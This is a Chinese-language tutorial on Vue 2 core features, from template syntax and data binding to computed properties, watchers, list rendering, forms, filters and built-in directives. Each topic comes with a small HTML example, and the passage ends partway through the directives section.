Vue核心

news2025/1/23 7:09:16

目录

  • 一、初始Vue
  • 二、模板语法
  • 三、数据绑定
  • 四、el和data的两种写法
  • 五、MVVM模型
  • 六、数据代理
  • 七、事件处理
  • 八、计算属性
  • 九、监视属性
  • 十、绑定样式
  • 十一、条件渲染
  • 十二、列表渲染
  • 十三、收集表单数据
  • 十四、过滤器
  • 十五、内置指令
  • 十六、自定义指令
  • 十七、生命周期

简介:
Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架。与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用。Vue 的核心库只关注视图层,不仅易于上手,还便于与第三方库或既有项目整合。另一方面,当与现代化的工具链以及各种支持类库结合使用时,Vue 也完全能够为复杂的单页应用提供驱动。

一、初始Vue

  1. 想让Vue工作,就必须创建t一个Vue实例,且要传入个 配置对象;
  2. root容器里的代码依然符合html规范,只不过混入了些特殊的Vue语法;
  3. root容器里的代码被称为[Vue模板] ;
  4. Vue实例和容器是一一对应的;
  5. 真实开发中只有一个Vue实例,并且会配合着组件一起使用;
  6. {{xxx}}中的xx要写js表达式,且xxx可以自动读取到data中的所有属性;
  7. 一旦data中的数据发生改变,那么模板中用到该数据的地方也会自动更新;
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>hello,{{name}}</h1>
        <h1>年龄:{{age}}</h1>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false //阻止 vue 在启动时生成生产提示。
    //创建vue实例
    const x = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"蓝朽",
            age:18
        }
    })
</script>
</html>

二、模板语法

Vue模板语法有2大类:

  1. 插值语法;
    功能:用于解析标签体内容。
    写法: {{xxx}}, xxx是js表达式,且 可以直接读取到data中的所有属性。
  2. 指令语法:
    功能:用于解析标签(包括:标签属性、标签体内容、绑定事件…)。
    举例: v-bind:href="xxx" 或简写为 :href="xxx", xxx同样要写js表达式,
    且可以直接读取到data中的所有属性。
    备注: Vue中有很多的指令,且形式都是: v-???, 此处我们只是拿v-bind举个例子。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>插值语法</h1>
        <h3>hello,{{name}}</h3>
        <hr>
        <h1>指令语法</h1>
        <a v-bind:href="url">点我去百度</a>
        <a :href="url">点我去百度2</a>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    //创建vue实例
    const x = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"蓝朽",
            url:"https://www.baidu.com"
        }
    })
</script>
</html>

三、数据绑定

Vue中有2种数据绑定的方式:

  1. 单向绑定(v-bind):数据只能从data流向页面。
  2. 双向绑定(v-model):数据不仅能从data流向页面,还可以从页面流向data。

备注:
1.双向绑定一般都应用在表单类元素上(如: input、 select等)
2. v-model:value可以简写为v-model,因为v-model默认收集的就是value值。

<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <title>Document</title>
</head>
<body>
 <div id="root">
     单向数据绑定:<input type="text" :value="name"><br>
     双向数据绑定:<input type="text" v-model:value="name">
 </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
 //创建vue实例
 const x = new Vue({
     el:"#root", //指定容器名称
     data:{ //用来存放数据
         name:"蓝朽",
     }
 })
</script>
</html>

四、el和data的两种写法

data与el的2种写法

  1. el有2种写法
    (1) .new Vue时候配置el属性。
    (2) .先创建Vue实例,随后再通过vm.$mount( ’ #root’)指定el的值。
  2. data有2种写法
    (1).对象式
    (2).函数式
    如何选择:目前哪种写法都可以,以后学习到组件时,data必须使用函数式,否则会报错。
  3. 一个重要的原则:
    由Vue管理的函数,一定不要写箭头函数,一旦写了箭头函数, this就不再是Vue实例了。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>

<!-- 准备好一个容器-->

    <div id="root">
        <h1>hello,{{name}}</h1>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    //创建vue实例
    const x = new Vue({
         //el:"#root",el第一种写法
        // data:{ //用来存放数据
        //     name:"蓝朽"
        // } data的第一种写法
        data(){//data第二种写法
            console.log(this)//这里的this是vue实例对象
            return{
                name:"蓝朽"
            }
        }
    })
    x.$mount('#root')//el第二种写法
</script>
</html>

五、MVVM模型

MVVM模型

  1. M:模型(Model) ; data中的数据
  2. V:视图(View) :模板代码
  3. VM: 视图模型(ViewModel): Vue实例

观察发现:
4. data中所有的属性,最后都出现在了Vm身上。
5. vm身上所有的属性及Vue原型上所有属性,在Vue模板中都可以直接使用。
在这里插入图片描述

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<div id="root">
    <h1>学校名称:{{name}}</h1>
    <h1>学校地址:{{address}}</h1>
    <!--Vm身上的$options属性-->
    <h1>测试1:{{$options}}</h1>
</div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    //创建vue实例
    const x = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"bzhan",
            address:"四川"
        }
    })
</script>
</html>

六、数据代理

数据代理:通过一个对象代理对另一个对象中属性的操作(读/写)
例子:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <script>
        let obj1 = {x:100};
        let obj2 = {y:200};
        Object.defineProperty(obj2,'x',{
            get(){
                return obj1.x;
            },
            set(value){
                obj1.x = value;
            }
        })
    </script>
</body>
</html>

Object.defineProperty()静态方法直接在对象上定义新属性,或修改对象上的现有属性,然后返回对象
再比如:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root"></div>
</body>
<script type="text/javascript">
    let number = 18
    let person = {
        name:"蓝朽",
        sex:"男"
    }
    Object.defineProperty(person,'age',{
        // value:18,
        // enumerable:true, //控制属性是否可以枚举,默认值是false
        // writable:true, //控制属性是否可以被修改,默认值是false
        // configurable:true //控制属性是否可以被删除,默认值是false
        //当有人读取person的age属性时,get函 数(getter)就会被调用,且返回值就是age的值
        get(){
            return number;
        },
        //当有人修改person的age属性时,set函数(setter)就会被调用,且会收到修改的具体值
        set(value){
            number = value;
        }
    })
    console.log(person)
</script>
</html>

Vue中的数据代理:

  1. Vue中的数据代理:
    通过vm对象来代理data对象中属性的操作(读/写)
  2. Vue中数据代理的好处:
    更加方便的操作data中的数据
  3. 基本原理:
    通过0bject.defineProperty()把data对象中所有属性添加到vm上。
    为每一个添加到vm上的属性,都指定一个getter/setter 。
    在getter/setter内部去操作(读/写) data中对应的属性。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>学校名称:{{name}}</h1>
        <h1>学校地址:{{address}}</h1>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"b站",
            address:"四川"
        }
    })
</script>
</html>

在这里插入图片描述

七、事件处理

事件的基本使用:

  1. 使用v-on:xxx或@xx绑定事件,其中xxx是 事件名;
  2. 事件的回调需要配置在methods对象中,最终会在vm上;
  3. methods中配置的函数,不要用箭头函数!否则this就不是vm了;
  4. methods中配置的函数,都是被Vue所管理的函数,this的指向是vm或组件实例对象;
  5. @click="demo"和@click="demo($event)"效果一致, 但后者可以传参;
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>hello,{{name}}</h1>
        <button v-on:click="showInfo1">按钮1</button>
        <button @click="showInfo2($event,66)">按钮2</button>
    </div>
    
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"蓝朽"
        },
        methods:{
            showInfo1(event) {
                console.log(event.target.innerText);
                console.log(this)//这里this是vm
                alert("showinfo1");
            },
            showInfo2(event,num) {
                console.log(event,num);
            },
        }
    })
</script>
</html>

键盘事件:

  1. Vue中常用的按键别名:
    回车=> enter
    删除=> delete (捕获“删除"和“退格”键)
    退出=>esc
    空格=> space
    换行=> tab
    上=>up
    下=>down
    左=>left
    右=> right
  2. Vue未提供别名的按键,可以使用按键原始的key值去绑定,但注意要转为kebab-case(短横线命名)
  3. 系统修饰键(用法特殊) : ctrl、alt、shift、 meta
    (1).配合keyup使用:按下修饰键的同时,再按下其他键,随后释放其他键,事件才被触发。
    (2).配合keydown使用:正常触发事件。
  4. 也可以使用keyCode去指定具体的按键(不推荐)
  5. Vue.config.keyCodes.自定义键名=键码,可以去定制按键别名
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h2>hello,{{name}}</h2>
        <!-- keyup:按键按下并松开,keydown:按下不用松开就触发 -->
        <input type="text" placeholder="按下回车提示输入" @keyup.enter="showInfo">
        <input type="text" placeholder="按下ctrl+y提示" @keyup.ctrl.y="showInfo">
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"蓝朽"
        },
        methods:{
            showInfo(event){
                console.log(event.key,event.keyCode)
                console.log(event.target.value)
            }
        }
    })
</script>
</html>

Vue中的事件修饰符:

  1. prevent:阻止默认事件(常用) ;
  2. stop:阻止事件冒泡(常用) ;
  3. once:事件只触发次 (常用) ;
  4. capture:使用事件的捕获模式;
  5. self:只有event.target是当前操作的元素时才触发事件;
  6. passive:事件的默认行为立即执行,无需等待事件回调执行完毕;
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        *{
            margin-top: 30px;
        }
        .mao{
            height: 70px;
            width: 70px;
            background-color: skyblue;
        }
        .box1{
            height: 70px;
            width: 70px;
            background-color: aqua;
        }
        .box2{
            height: 45px;
            width: 45px;
            margin: auto;
            background-color: blue;
        }
        .list{
            width: 200px;
            height: 200px;
            background-color: blueviolet;
            overflow: auto;
            list-style: none;
            padding-inline-start: 0%;

        }
        li{
            margin: 0px;
            text-align: center;
            height: 100px;
        }
    </style>
</head>
<body>
    <div id="root">
        <!--  prevent:阻止默认事件(常用) ; -->
        <a href="https://www.baidu.com" @click.prevent="showInfo1">超链接</a>
        <!--stop:阻止事件冒泡(常用) ;  -->
        <div class="mao" @click="showInfo2(1)">
            <!-- <button @click.stop="showInfo2(2)">按钮stop</button> -->
            <!-- 修饰符可以连着写 -->
            <a href="https://www.baidu.com" @click.prevent.stop="showInfo1">超链接</a>
        </div>
        <!-- once:事件只触发次 (常用) ; -->
        <button @click.once="showInfo3">按钮once</button>
        <!-- capture:使用事件的捕获模式; -->
        <div class="box1" @click.capture="showInfo4(1)">
            div1
            <div class="box2" @click="showInfo4(2)">div2</div>
        </div>
        <!-- self:只有event.target是当前操作的元素时才触发事件; -->
        <div class="mao" @click.self="showInfo5">
            <button @click="showInfo5">按钮self</button>
        </div>
        <!-- passive:事件的默认行为立即执行,无需等待事件回调执行完毕;@scroll:滚动条, @wheel:鼠标滚轮 -->
        <ul @wheel.passive="showInfo6" class="list">
            <li>1</li>
            <li>2</li>
            <li>3</li>
            <li>4</li>
        </ul>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:"蓝朽"
        },
        methods:{
            showInfo1(event) {
                alert("showinfo1");
            },
            showInfo2(num) {
                console.log(num);
            },
            showInfo3(){
                alert("只弹一次");
            },
            showInfo4(num){
                console.log(num);
            },
            showInfo5(event){
                console.log(event.target);
            },
            showInfo6(){
                for (let index = 0; index < 100000; index++) {
                    console.log("#");
                    
                }
                console.log("success!");
            }
        }
    })
</script>
</html>

八、计算属性

计算属性:

  1. 定义: 要用的属性不存在,要通过已有属性计算得来。
  2. 原理:底层借助了objcet.defineproperty方法提供的getter和setter。
  3. get函数什么时候执行?
    (1).初次读取时会执行次。
    (2).当依赖的数据发生改变时会被再次调用。
  4. 优势:与methods 实现相比,内部有缓存机制(复用),效率更高,调试方便。
  5. 备注:
    1.计算属性最终会出现在vm上,直接读取使用即可。
    2.如果计算属性要被修改,那必须写set函数去响应修改,且set中要引起计算时依赖的数据发生改变。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>计算属性实现</title>
</head>
<body>
    <div id="root">
        姓:<input type="text" v-model="firstName"><br>
        名:<input type="text" v-model="lastName"><br>
        全名:<span>{{fullName}}</span>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            firstName:"蓝",
            lastName:"朽"
        },
        computed:{
        	//计算属性完整写法
            fullName:{
                //get有什么作用?当有人读取fu11Name时,get就 会被调用,且返回值就作为fullName的值
                //get什么时候调用? 1. 初次读取fu11Name时。2. 所依赖的数据发生变化时。
                get(){
                    console.log("get被调用了");
                    // console.log(this)//这里的this是vm
                    return this.firstName +'-'+this.lastName;
                },
                //set什么时候调用?当fullName被修改的时候
                set(value){
                    console.log("set被调用了");
                    const arr = value.split('-');
                    this.firstName = arr[0];
                    this.lastName = arr[1];
                }
            }
             //计算属性简写,当只考虑读取,没有修改的时候才能简写
        	//fullName(){
	        //    console.log("get被调用了");
	            // console.log(this)//这里的this是vm
	        //    return this.firstName +'-'+this.lastName;
            //}
        }
        }
    })
</script>
</html>

九、监视属性

监视属性watch:

  1. 当被监视的属性变化时,回调函数自动调用,进行相关操作
  2. 监视的属性必须存在,才能进行监视! !
  3. 监视的两种写法:
    (1) . new Vue时传入watch配置
    (2) .通过vm.$watch监视
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>今天天气很{{weather}}</h1>
        <!-- 绑定事件的时候:@xxx='yyy' 可以写一些简单的语句 -->
        <!-- <button @click="isHot=!isHot">点击切换</button> -->
        <button @click="changeWeather">点击切换</button>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            isHot:true
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot;
            }
        },
        computed:{
            weather(){
                return this.isHot?"炎热":"凉爽";
            }
        },
        // watch:{
        //     isHot:{
        //         immediate:true,//页面加载完成时立即执行
        //         //当isHot被修改是调用
        //         handler(newValue,oldValue){
        //             console.log("isHot被修改了",newValue,oldValue);
        //         }
        //     }
                //简写
         		isHot(newValue,oldValue){
                	console.log("isHot被修改了",newValue,oldValue);
          		}
        // }
    })
    vm.$watch('isHot',{
        immediate:true,//页面加载完成时立即执行
        //当isHot被修改是调用
        handler(newValue,oldValue){
            console.log("isHot被修改了",newValue,oldValue);
        }
    })
    //简写
    // vm.$watch('isHot',function(newValue,oldValue) {
    //     console.log("isHot被修改了",newValue,oldValue);
    // })
</script>
</html>

深度监视:
(1).Vue的watch默认不监测对象内部值的改变(一层)。
(2).配置deep:true可以监测对象内部值改变(多层)。
备注:
(1).Vue自身可以监测对象内部值的改变,但Vue提供的watch默认不可以!
(2).使用watch时根据数据的具体结构,决定是否采用深度监视。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h1>今天天气很{{weather}}</h1>
        <!-- 绑定事件的时候:@xxx='yyy' 可以写一些简单的语句 -->
        <!-- <button @click="isHot=!isHot">点击切换</button> -->
        <button @click="changeWeather">点击切换</button>
        <hr>
        <h1>a的值是{{number.a}}</h1>
        <button @click="number.a++">a++</button>
        <h1>b的值是{{number.b}}</h1>
        <button @click="number.b++">b++</button>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            isHot:true,
            number:{
                a:1,
                b:2
            }
        },
        methods: {
            changeWeather(){
                this.isHot = !this.isHot;
            }
        },
        computed:{
            weather(){
                return this.isHot?"炎热":"凉爽";
            }
        },
        watch:{
            isHot:{
                //immediate:true,//页面加载完成时立即执行
                //当isHot被修改是调用
                handler(newValue,oldValue){
                    console.log("isHot被修改了",newValue,oldValue);
                }
            },
            //监视多级结构中所有属性的变化
            'number':{
                deep:true,
                handler(){
                    console.log("number的值被改变了");
                }
            }
        }
    })
</script>
</html>

十、绑定样式

绑定样式:

  1. class样式
    写法:class=“xxx” xxx可以是字符串、对象、数组。
    字符串写法适用于:类名不确定,要动态获取。
    对象写法适用于:要绑定多个样式,个数不确定,名字也不确定。
    数组写法适用于:要绑定多个样式,个数确定,名字也确定,但不确定用不用。
  2. style样式
    :style=“{fontSize: xxx}” 其中x是动态值。
    :style="[a,b]"其中a、b是样式对象。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        .basic{
            height: 200px;
            width: 200px;
            border: 1px solid black;
            text-align: center;
            line-height: 100px;
        }
        .normal{
            background-color: aqua;
            border-radius: 50%;
        }
        .sad{
            background-color: gray;
            border-radius: 40px;
        }
        .happy{
            background-color: red;
            border-radius: 30px;
        }
    </style>
</head>
<body>
    <div id="root">
        <!--绑定class样式--字符串写法,适用于:样式的类名不确定,需要动态指定-->
        <div class="basic" :class="value" @click="changeClass">{{name}}</div>
        <!--绑定class样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定-->
        <hr>
        <div class="basic" :class="classArr">{{name}}</div>
        <hr>
        <!-- 绑定class样式--对象写法, 适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用--> 
        <div class="basic" :class="classObj">{{name}}</div>
        <hr>
        <!-- style--对象写法--> 
        <div class="basic" :style="styleObj">{{name}}</div>
        <hr>
        <!-- style--数组写法--> 
        <div class="basic" :style="[styleObj]">{{name}}</div>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:'蓝朽',
            value:'normal',
            classArr:['normal','sad','happy'],
            classObj:{
                'normal':false,
                'sad':true
            },
            styleObj:{
                fontSize: "40px"
            }
        },
        methods: {
          changeClass(e){
            const arr = ['normal','sad','happy'];
            const index = Math.floor(Math.random()*3);
            this.value = arr[index];
          }  
        },
    })
</script>
</html>

十一、条件渲染

条件渲染:

  1. v-if
    写法:
    (1).v-if="表达式”
    (2).v-else-if="表达式”
    (3).v-else="表达式”
    适用于:切换频率较低的场景。
    特点:不展示的DOM元素直接被移除。
    注意: v-if可以和:v-else-if、 v-else起使用,但要求结构不能被“打断”。
  2. v-show
    写法: v-show=" 表达式”
    适用于:切换频率较高的场景。
    特点:不展示的DOM元素未被移除,仅仅是使用样式隐藏掉
  3. 备注:使用v-if的时,元素可能无法获取到,而使用v-show 定可以获取到。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>

    <div id="root">
        <h2>当前的n值是:{{n}}</h2>
        <button @click= "n++">点我n+1</button>
        <!--使用v-show做条件渲染-->
        <!-- <h2 v-show="false">欢迎{{name}}</h2> -->
        <!-- <h2 v-show="1 === 1" >欢迎{{name}}</h2> -->
        <!--使用v-if做条件渲染-->
        <!-- <h2 v-if="false">欢迎{{name}}</h2> -->
        <!-- <h2 v-if="1 === 1">欢迎{{name}}</h2> -->
        <!-- v-else和v-else-if -->
        <!-- <div v-if="n === 1">Angular</div>
        <div v-else-if="n === 2">React< /div>
        <div v-else-if="n === 3">Vue</div>
        <div v-else>哈哈</div> -->
        <!-- template只能和v-if配合使用 -->
        <template v-if="n === 1">
	        <h2>你好</h2>
	        <h2>{{name}}</h2>
	        <h2>北京</h2>
        </template>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            name:'蓝朽',
            n:0
        }
    })
</script>
</html>

十二、列表渲染

v-for指令;

  1. 用于展示列表数据
  2. 语法: v-for=“(item, index) in xxx” : key=“yyy”
  3. 可遍历:数组、对象、字符串(用的很少)、指定次数(用的很少)
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <!-- 遍历列表 -->
        <h2>人员列表</h2>
        <ul>
            <li v-for="(p,index) in persons" :key="index">
                {{p.name}}-{{p.age}}
            </li>
        </ul>
        <!-- 遍历对象 -->
        <h2>汽车信息</h2>
        <ul>
            <li v-for="(val,k) in car" :key="k">
                {{k}}-{{val}}
            </li>
        </ul>
        <!-- 遍历字符串 -->
        <h2>遍历字符串(用的少)</h2>
        <ul>
            <li v-for="(char,index) in str" :key="index">
                {{char}}-{{index}}
            </li>
        </ul>
        <!-- 遍历指定次数-->
        <h2>遍历指定次数(用的少)</h2>
        <ul>
            <li v-for="(number,index) in 5" :key="index">
                {{index}}-{{number}}
            </li>
        </ul>
    </div>
</body>
<script src="../js/vue.js"></script>
<script type="text/javascript">
    Vue.config.productionTip=false;
    //创建vue实例
    const vm = new Vue({
        el:"#root", //指定容器名称
        data:{ //用来存放数据
            persons:[
                {id:'001',name:'张三',age:18},
                {id:'002',name:'李四',age:19},
                {id:'003',name:'王五',age:20}
            ],
            car:{
                name:"兰博基尼",
                price:'200万',
                color:"蓝色"
            },
            str:"hello vue"
        }
 
    })
</script>
</html>

十三、收集表单数据

收集表单数据:
若: <input type="text"/>, 则v-model收集的是value值,用户输入的就是value值。
若: <input type=" radio"/>,则v-model收集的是value值,且要给标签配置value值。
若: <input type=" checkbox"/>

  1. 没有配置input的value属性,那么收集的就是checked (勾选or未勾选,是布尔值)
  2. 配置input的value属性:
    (1)v-model的初始值是非数组,那么收集的就是checked (勾选or未勾选,是布尔值)
    (2)v-model的初始值是数组,那么收集的的就是value组成的数组

备注: v-model的三个 修饰符:
lazy:失去焦点再收集数据
number:输入字符串转为有效的数字
trim:输入首尾空格过滤

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <form @submit.prevent="demo">
            <label for="demo">账号</label>
            <input type="text" id="demo" v-model.trim="userInfo.account"><br><br>
            密码:<input type="password" v-model="userInfo.password"><br><br>
            年龄:<input type="number" v-model.number="userInfo.age"><br><br>
            性别:
            <input type="radio" name="sex" v-model="userInfo.sex" value="male"><input type="radio" name="sex" v-model="userInfo.sex" value="female"><br><br>
            爱好:
            <input type="checkbox" v-model="userInfo.hobby" value="抽烟">抽烟
            <input type="checkbox" v-model="userInfo.hobby" value="喝酒">喝酒
            <input type="checkbox" v-model="userInfo.hobby" value="吃肥肉">吃肥肉<br><br>
            所属校区:
            <select v-model="userInfo.city">
                <option value="">请选择校区</option>
                <option value="北京">北京</option>
                <option value="上海">上海</option>
                <option value="四川">四川</option>
            </select><br><br>
            其他信息:
            <textarea cols="30" rows="10" v-model.lazy="userInfo.other"></textarea><br><br>
            <input type="checkbox" v-model="userInfo.agree">同意并接受
            <a href="https://www.baidu.com">《用户协议》</a>
            <button>提交</button>
        </form>
    </div>
</body>
<script src="../js/vue.js"></script>
<script>
    const vm = new Vue({
        el:"#root",
        data:{
            userInfo:{
                account:'',
                password:'',
                age:18,
                sex:'male',
                hobby:[],
                city:'',
                other:'',
                agree:''
            }
        },
        methods: {
            demo(){
                console.log(JSON.stringify(this.userInfo));
            }
        },
        
    })
</script>
</html>

十四、过滤器

过滤器:
定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理),
语法:

  1. 注册过滤器: Vue.filter(name ,callback)或new Vue{filters:{}}
  2. 使用过滤器: {{ xxx|过滤器名}} 或v-bind:属性 = “xxx|过滤 器名”

备注:

  1. 过滤器也可以接收额外参数、多个过滤器也可以串联
  2. 并没有改变原本的数据,是产生新的对应的数据
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h2>显示格式化后的时间</h2>
        <h2>现在是:{{time}}</h2>
        <!-- 计算属性实现 -->
        <h2>格式化后:{{fmtTime}}</h2>
        <!-- methods方法实现 -->
        <h2>格式化后:{{getFmtTime()}}</h2>
        <!-- 过滤器实现 ,time会传入timeFormater-->
        <h2>格式化后:{{time | timeFormater }}</h2>
        <!-- 过滤器传参 -->
        <h2>格式化后:{{time | timeFormater('YYYY_MM_DD') | mySlice}}</h2>
        <h2 :x="msg | mySlice">hello vue</h2>
    </div>
    <div id="root2">
        <h1>{{msg | mySlice}}</h1>
    </div>
</body>
<script src="../js/vue.js"></script>
<script src="../js/dayjs.min.js"></script>
<script>
    //全局过滤器
    Vue.filter('mySlice',function(value) {
        return value.slice(0,4);
    })
 const vm = new Vue({
    el:"#root",
    data:{
        time:1683597183202, //时间戳
        msg:"helloword"
    },
    computed:{
        fmtTime(){
            return dayjs(this.time).format('YYYY年MM月-DD日 HH:mm:ss');
        }
    },
    methods: {
        getFmtTime(){
            return dayjs(this.time).format('YYYY年MM月-DD日 HH:mm:ss');
        }  
    },
    //局部过滤器
    filters:{
        //第一个参数是通过管道把time传进来,第二个参数是()传入,默认值'YYYY年MM月-DD日 HH:mm:ss'
        timeFormater(value,str='YYYY年MM月-DD日 HH:mm:ss'){
             return dayjs(value).format(str);
        },
        mySlice(value){
            return value.slice(0,4);
        }
    }
 })
 new Vue({
    el:"#root2",
    data:{
        msg:"hello world"
    }
 })
</script>
</html>

在这里插入图片描述

十五、内置指令

我们学过的指令:

  • v-bind :单向绑定解析表达式,可简写为:xxx
  • v-model:双向数据绑定
  • v-for:遍历数组/对象/字符串
  • v-on:绑定事件监听,可简写为@
  • v-if:条件渲染(动态控制节点是否存存在)
  • v-else:条件渲染(动态控制节点是否存存在)
  • v-show:条件渲染(动态控制节点是否展示)
  • v-text指令:
    1.作用:向其所在的节点中渲染文本内容。
    2.与插值语法的区别: v-text会替换掉节点中的内容,{{xx}}则不会。
  • v-html指令:
    1. 作用:向指定节点中渲染包含html结构的内容。
    2. 与插值语法的区别:
      (1).v-html会替换掉节点中所有的内容,{{xx}}则不会。
      (2) .v-html可以识别html结构。
    3. 严重注意: v-html有安全性问题! ! ! !
      (1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。
      (2).一定要在可信的内容上使用v-html,永不要用在用户提交的内容上!
  • v-cloak指令(没有值) :
    1. 本质是一个特殊属性,Vue实例创建完毕并接管容器后,会删掉v-cloak属性。
    2. 使用css配合v-cloak可以解决网速慢时页面展示出{ {xxx}}的问题。
  • v-once指令:
    1. v-once所在节点在初次动态渲染后,就视为静态内容了。
    2. 以后数据的改变不会引起v-once所在结构的更新,可以用于优化性能。
  • v-pre指令:
    1. 跳过其所在节点的编译过程。
    2. 可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
      <style>
	        [v-cloak]{
	            display: none;
	        }
    </style>
</head>
<body>
    <div id="root">
        <h1 v-pre>hello vue</h1>
        <h1 v-text="msg"></h1>
        <div v-html="str1"></div>
